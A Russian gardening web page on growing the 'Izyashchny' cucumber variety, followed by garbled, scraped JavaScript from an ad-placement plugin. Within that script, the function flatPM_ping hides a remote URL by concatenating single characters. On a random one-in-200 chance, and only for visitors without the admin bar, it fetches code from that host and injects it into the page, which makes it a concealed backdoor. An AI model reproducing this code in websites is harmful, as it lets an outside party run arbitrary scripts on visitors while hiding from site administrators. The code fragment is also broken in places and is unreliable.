При посеве в грунт необходимо дождаться пока почва прогреется до +15°С. Семена высеваются на глубину 1,5-2 см. Почва для посева огурцов традиционно готовится еще с осени, поскольку необходимо, чтобы она была рыхлой и плодородной, с большим содержанием гумуса. Для этого на глубину в 10-20 см закладывается достаточно мощный слой органического вещества, который к посеву уже успевает начать разлагаться и выделять тепло и питательные вещества. После посева грунт поддерживают в постоянно влажном состоянии, поливая при необходимости ежедневно. Возможно до появления всходов огурца прикрыть грядку дополнительно любым укрывным материалом для сохранения тепла и влажности.

При появлении всходов желательно поставить опоры или шпалеры для того, чтобы можно было пустить растения огурца расти по вертикали. Это и экономит место, и позволяет формировать кусты огурца Изящный, и облегчает уход за ним и сбор урожая.

Уход за огурцами

Будучи очень неприхотливым сортом, огурец Изящный никаких особенных приемов в выращивании не требует, но все-таки основные правила ухода соблюдать необходимо. Так как огурцы на 90% состоят из воды, самое основное, что нужно для успешного выращивания огурцов – это регулярный и своевременный полив. В жаркую солнечную погоду необходимо будет поливать кусты огурца каждый день.

Для хорошего и обильного плодоношения огурцам сорта Изящный также необходимы регулярные подкормки раз в 10-12 дней. Лучше всего чередовать подкормки комплексными минеральными удобрениями, содержащими микроэлементы, с органическими удобрениями.

Для растений огурцов сорта Изящный, выращиваемых в теплице, необходимо обеспечить свободный доступ пчел и других насекомых для хорошего опыления. Хотя сорт огурца Изящный является частично самоопыляемым, то есть у него встречаются цветки, у которых есть одновременно и пестик, и тычинки. Таким образом, урожай даже без насекомых все равно будет, но для его увеличения желательно привлечь пчел и шмелей, опрыскивая кусты медовым или сахарным сиропом.

Если насекомых все равно мало, например, при ранних сроках выращивания огурцов в теплицах, то в этих случаях нередко прибегают к искусственному опылению. В нем нет ничего сложного. Для этого мужские цветки (с тычинками) освобождают от лепестков и пыльниками вручную несколько раз проводят по пестику в женских цветках, как на фото ниже.

Основным приемом для образования максимально возможного урожая, а также для профилактики различных заболеваний, является формирование и обрезка кустов огурца Изящный. Ведь у растений огурца корневая система достаточно слабая, и часто не справляется с обеспечением питательными веществами и водой всех образовавшихся завязей. Некоторые из них поэтому могут засыхать и увядать. Чтобы предотвратить этот процесс, у куста необходимо заблаговременно удалить лишние части. Так как сорт Изящный отличается среднерослостью, то и обрезка и формирование нужны минимальные, по сравнению с другими более сильнорослыми сортами.

Начиная от 4-6 листа снизу, основной стебель прищипывают, а вырастающие боковые побеги направляют к опорам, пришпиливают к земле и частично присыпают грунтом для получения дополнительных корней. Куст огурца сорта Изящный формирует обычно 5-6 плетей, и этого приема бывает достаточно, чтобы в полной мере обеспечить максимальную урожайность этого сорта огурцов.

Собирать огурцы следует по возможности каждый день, чтобы стимулировать образование новых завязей. При хорошем уходе сбор огурцов может происходить в течение всего летнего периода.

Отзывы огородников о сорте Изящный

Огурец Изящный действительно пользуется народной любовью на протяжении уже многих лет, свидетельством чему являются многочисленные положительные отзывы и фото выращенных огурцов.

Как видите, отзывы об огурцах сорта Изящный самые позитивные, не зря ведь сорт существует уже столько лет и многие продолжают с удовольствием его выращивать. Пускай он и не обладает какими-то супер характеристиками новейших гибридов, но зато урожай огурцов вам гарантирован в любом случае.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};